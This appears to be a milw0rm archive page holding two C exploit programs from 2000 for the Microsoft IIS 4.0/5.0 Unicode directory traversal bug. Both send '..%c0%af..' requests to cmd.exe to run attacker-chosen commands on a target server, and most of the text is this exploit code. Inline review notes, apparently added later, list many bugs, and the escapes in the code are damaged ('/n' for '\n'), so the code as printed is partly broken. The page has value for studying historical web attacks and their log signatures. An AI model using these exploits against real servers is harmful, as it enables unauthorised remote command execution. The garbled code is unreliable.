
[2000]MS Windows IIS Unicode Remote Traversal Bug

/* iisex iis exploit  (<- nost's idea) v2
* --------------------------------------
* Okay.. the first piece of code was not really finished.
* So, i apologize to everybody..
*
* by incubus <incubus@securax.org>
*
* grtz to: Bio, nos, zoa, reg and vor... (who else would stay up
* at night to exploit this?) to securax (#securax@efnet) - also
* to kim, glyc, s0ph, tessa, lamagra and steven.
*/

#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

/*
 * Entry point of the first listing.  Loops forever: reads one command line
 * from stdin, turns spaces into '+', and sends it as the query string of a
 * GET for cmd.exe through the "%c0%af" path component (an overlong UTF-8
 * encoding of '/' that unpatched IIS 4/5 decoded only after its traversal
 * check; "%c0%af" in web logs is the signature defenders look for).
 *
 * argv[1] is the target host; port 80 is hard-coded.  Never returns normally,
 * only via exit().
 *
 * NOTE(review): every "/n" in the string literals and the '/n' character
 * constant below look like an extraction artifact for "\n" (backslashes
 * replaced by slashes); '/n' as written is a multi-character constant.
 * Reviewer notes on the original defects follow inline; the code is kept
 * exactly as published.
 */
int main(int argc, char **argv){
char buffy[666]; /* well, what else? I dunno how long your commands are.. */
/* buffy: the request line, 51-byte prefix + command + 13-byte suffix + NUL.
 * Never zeroed, which matters at the send() below. */
char buf[500]; /* raw command line from stdin; filled by gets(), so no bound is enforced. */
char rcvbuf[8192]; /* response bytes; never NUL-terminated before being printed. */
int i, sock, result;
struct sockaddr_in 	name; /* sin_zero is never cleared. */
struct hostent 	*hostinfo;
if (argc < 2){
printf ("try %s www.server.com/n", argv[0]);
printf ("will let you play with cmd.exe of an IIS4/5 server./n");
printf ("by incubus <incubus@securax.org>/n/n");
exit(0);
}
printf ("/niisex - iis 4 and 5 exploit/n---------------------------/n");
printf ("act like a cmd.exe kiddie, type quit to quit./n");
for (;;)
{
printf ("/n[enter cmd> ");
gets(buf); /* unbounded read into a 500-byte stack buffer: a stack overflow waiting to happen; gets() was removed in C11, fgets(buf, sizeof buf, stdin) is the bounded form. */
if (strstr(buf, "quit")) exit(0); /* any line that merely contains "quit" ends the session, not just the word itself. */
i=0;
/* Replace spaces (32) with '+' (43) so the command survives as a query string.
 * gets() strips the trailing newline, so buf never holds one; and because
 * '/n' is a multi-character constant no char value can ever equal it, so the
 * loop has no condition it can satisfy and walks past the NUL terminator into
 * whatever follows buf on the stack (out-of-bounds read and write).  Bounding
 * on '\0' would stop at the terminator. */
while (buf[i] != '/n'){
if(buf[i] == 32) buf[i] = 43;
i++;
}
hostinfo=gethostbyname(argv[1]); /* re-resolved on every command; loop-invariant work. */
if (!hostinfo){
herror("Oops"); exit(-1);
}
name.sin_family=AF_INET; name.sin_port=htons(80); /* port 80 hard-coded. */
name.sin_addr=*(struct in_addr *)hostinfo->h_addr; /* first address of the result only. */
sock=socket(AF_INET, SOCK_STREAM, 0);
result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in)); /* sock is used here before the < 0 check below. */
if (result != 0) { herror("Oops"); exit(-1); } /* connect() reports through errno, not h_errno; herror() prints the wrong error, perror() is the matching call. */
if (sock < 0){ /* too late: a failed socket() (-1) has already been handed to connect(). */
herror("Oops"); exit(-1);
}
strcpy(buffy,"GET /scripts/../%c0%af../winnt/system32/cmd.exe?/c+");
strcat(buffy,buf); /* unbounded; fits only while buf stayed within its 500 bytes, which gets() does not guarantee. */
strcat(buffy, " HTTP/1.0/n/n");
send(sock, buffy, sizeof(buffy), 0); /* sends all 666 bytes: the request plus the uninitialized stack bytes after its NUL, i.e. the client's own stack contents go to the server. strlen(buffy) is the intended length; the return value is unchecked. */
recv(sock, rcvbuf, sizeof(rcvbuf), 0); /* single recv() with the return value ignored: a partial or failed read goes unnoticed. */
printf ("%s", rcvbuf); /* rcvbuf is never NUL-terminated; %s reads past the received bytes into uninitialized memory until it finds a zero. */
close(sock); /* close() is not declared by the includes above (<unistd.h> is missing): implicit declaration. */
}
}


/****************************************************************************/
**                                                                          **
**    Microsoft IIS 4.0/5.0 Extended UNICODE Directory Traversal Exploit    **
**      proof of theory exploit cuz it's wednesday and i'm on the couch     **
**                                                                          **
**       brought to you by the letter B, the number 7, optyx, and t12       **
**          optyx - <optyx@uberhax0r.net optyx@newhackcity.net>             **
**          t12 - <t12@uberhax0r.net>                                       **
**                                                                          **
**     greetz go out to aempirei, a gun toatin' gangstah' hustler' player   **
**     motherfucker who isn't with us anymore, miah, who's GTA2 game was    **
**     was most entertaining tonight, Cathy, who provided the trippy light  **
**     to stare at, and to KT, for providing me with hours of decent        **
**     conversation.                                                        **
**                                                                          **
/****************************************************************************/

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>

/*
 * Print the command-line synopsis to stderr and terminate with exit(-1).
 *
 * NOTE(review): the synopsis lists "-t" twice (target and timeout).  main()
 * reads the timeout from "-o" and the port from "-p", so "[-t timeout]" is
 * stale and should read "[-o timeout]".
 * NOTE(review): the "/n" at the end of the second string is most likely an
 * extraction artifact for "\n".
 */
void usage(void)
{
fprintf(stderr, "usage: ./iis-zank <-t target> <-c 'command' or -i>");
fprintf(stderr, " [-p port] [-t timeout]/n");
exit(-1);
}

/*
 * Entry point of the second listing.  Parses -t host, -c command (or -i for
 * an interactive loop), -p port, -o timeout and -h; builds a GET for cmd.exe
 * through the "%c0%af" overlong-UTF-8 path separator and echoes the raw
 * response one byte at a time.  Returns 0 after a single request, or loops
 * until "exit" is typed in interactive mode.
 *
 * NOTE(review): "/n" and "/0" throughout (and the "/" that ends the lines of
 * the banner above) look like extraction artifacts for "\n" / "\0"; '/0' as
 * written is a multi-character constant, not NUL.
 * NOTE(review): close() and alarm() are called but <unistd.h> is not among
 * the includes above, so both are implicitly declared.
 * Reviewer notes on the original defects follow inline; the code is kept
 * exactly as published.
 */
int main(int argc, char **argv)
{
int i, j; /* i: argv index, later the socket descriptor; j: flag index, later the connect() result. */
int port=80;
int timeout=3; /* seconds -- but no SIGALRM handler is ever installed, see the alarm() notes below. */
int interactive=0;
char temp[1]; /* one-byte receive buffer. */
char host[512]="";
char cmd[1024]="";
char request[8192]="GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+"; /* rebuilt with the same prefix on every iteration below. */
struct hostent *he;
struct sockaddr_in s_addr; /* sin_zero is never cleared. */

printf("iis-zank_bread_chafer_8000_super_alpha_hyper_pickle.c/n");
printf("by optyx and t12/n");

/* Option parsing.  Every argv element that starts with '-' is scanned letter
 * by letter, so "-ti" sets both.  Value-taking flags read argv[i+1] without
 * checking i+1 < argc: a trailing "-t" or "-p" passes NULL to strncpy()/atoi()
 * (undefined behavior).  Unknown letters are silently ignored. */
for(i=0;i<argc;i++)
{ if(argv[i][0] == '-') {
for(j=1;j<strlen(argv[i]);j++) /* int compared against size_t. */
{
switch(argv[i][j])
{
case 't':
strncpy(host, argv[i+1], sizeof(host)); /* not NUL-terminated when the argument is 512 bytes or longer. */
break;
case 'c':
strncpy(cmd, argv[i+1], sizeof(cmd)); /* likewise unterminated for an argument of 1024 bytes or more; strlen(cmd) below would then read past the array. */
break;
case 'h':
usage();
break;
case 'o':
timeout=atoi(argv[i+1]); /* this, not "-t", is the timeout flag usage() describes; atoi() reports no errors, so "-o abc" yields 0 and alarm(0) disarms the timeout. */
break;
case 'p':
port=atoi(argv[i+1]); /* unchecked; htons() truncates values above 65535. */
break;
case 'i':
interactive=1;
break;
default:
break;
}
}
}
}

if(!strcmp(host, ""))
{
fprintf(stderr, "specify target host/n");
usage();
}

if(!strcmp(cmd, "") && !interactive)
{
fprintf(stderr, "specify command to execute/n");
usage();
}

printf("]- Target - %s:%d/n", host, port);
if(!interactive)
printf("]- Command - %s/n", cmd);
printf("]- Timeout - %d seconds/n", timeout);
if((he=gethostbyname(host)) == NULL) /* resolved once, outside the loop. */
{
fprintf(stderr, "invalid target/n");
usage();
}

/* One request per iteration; repeats only in interactive mode.  Each
 * iteration opens a new socket and the only close() is after the loop, so an
 * interactive session leaks one descriptor per command. */
do
{

if(interactive)
{
cmd[0]=0;
printf("/nC> ");
if(fgets(cmd, sizeof(cmd), stdin) == NULL)
fprintf(stderr, "gets() error/n"); /* message names gets(); the call is fgets(). Execution continues with the empty cmd set above. */
cmd[strlen(cmd)-1]='/0'; /* meant to strip the newline; after the NULL fgets() above strlen(cmd) is 0 and this writes cmd[-1]. As written '/0' is a multi-character constant, so no NUL is stored either. */
if(!strcmp("exit", cmd))
exit(-1);
}

/* Encode spaces as '+' for the query string (int i against size_t strlen()). */
for(i=0;i<strlen(cmd);i++)
{
if(cmd[i]==' ')
cmd[i]='+';
}

/* Rebuild the request.  strncat() appends up to n bytes and then a NUL, so
 * the correct bound is sizeof(request) - strlen(request) - 1; the missing -1
 * is latent here only because cmd holds at most 1023 bytes. */
strncpy(request,
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+",
sizeof(request));
strncat(request, cmd, sizeof(request) - strlen(request));
strncat(request, "/n", sizeof(request) - strlen(request)); /* no "HTTP/1.x" token: an HTTP/0.9-style simple request. */

s_addr.sin_family = PF_INET; /* PF_INET where AF_INET is meant; same value on common systems. */
s_addr.sin_port = htons(port);
memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr,
sizeof(s_addr.sin_addr)); /* first address of the result only. */

if((i=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) /* i now holds the socket descriptor. */
{
fprintf(stderr, "cannot create socket/n");
exit(-1);
}

/* alarm() without any signal() call in this listing: the default action for
 * SIGALRM terminates the process, so a connect() that outlasts the timeout
 * kills the tool instead of reaching the "cannot connect" message. */
alarm(timeout);
j = connect(i, (struct sockaddr *) &s_addr, sizeof(s_addr));
alarm(0);

if(j==-1)
{
fprintf(stderr, "cannot connect to %s/n", host);
exit(-1);
close(i); /* unreachable: placed after exit(). */
}

if(!interactive)
printf("]- Sending request: %s/n", request);

send(i, request, strlen(request), 0); /* return value (short send or error) unchecked. */

if(!interactive)
printf("]- Getting results/n");

/* Echo the response byte by byte.  The alarm is armed around printf() and
 * cleared before the loop returns to recv(), so the one call that can block
 * is never covered: a server that holds the connection open without sending
 * hangs this loop indefinitely. */
while(recv(i,temp,1, 0)>0)
{
alarm(timeout);
printf("%c", temp[0]);
alarm(0);
}

}
while(interactive);

close(i); /* closes only the last socket opened (see the do-loop note). */
return 0;
}


# milw0rm.com [2000-11-18]

 
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息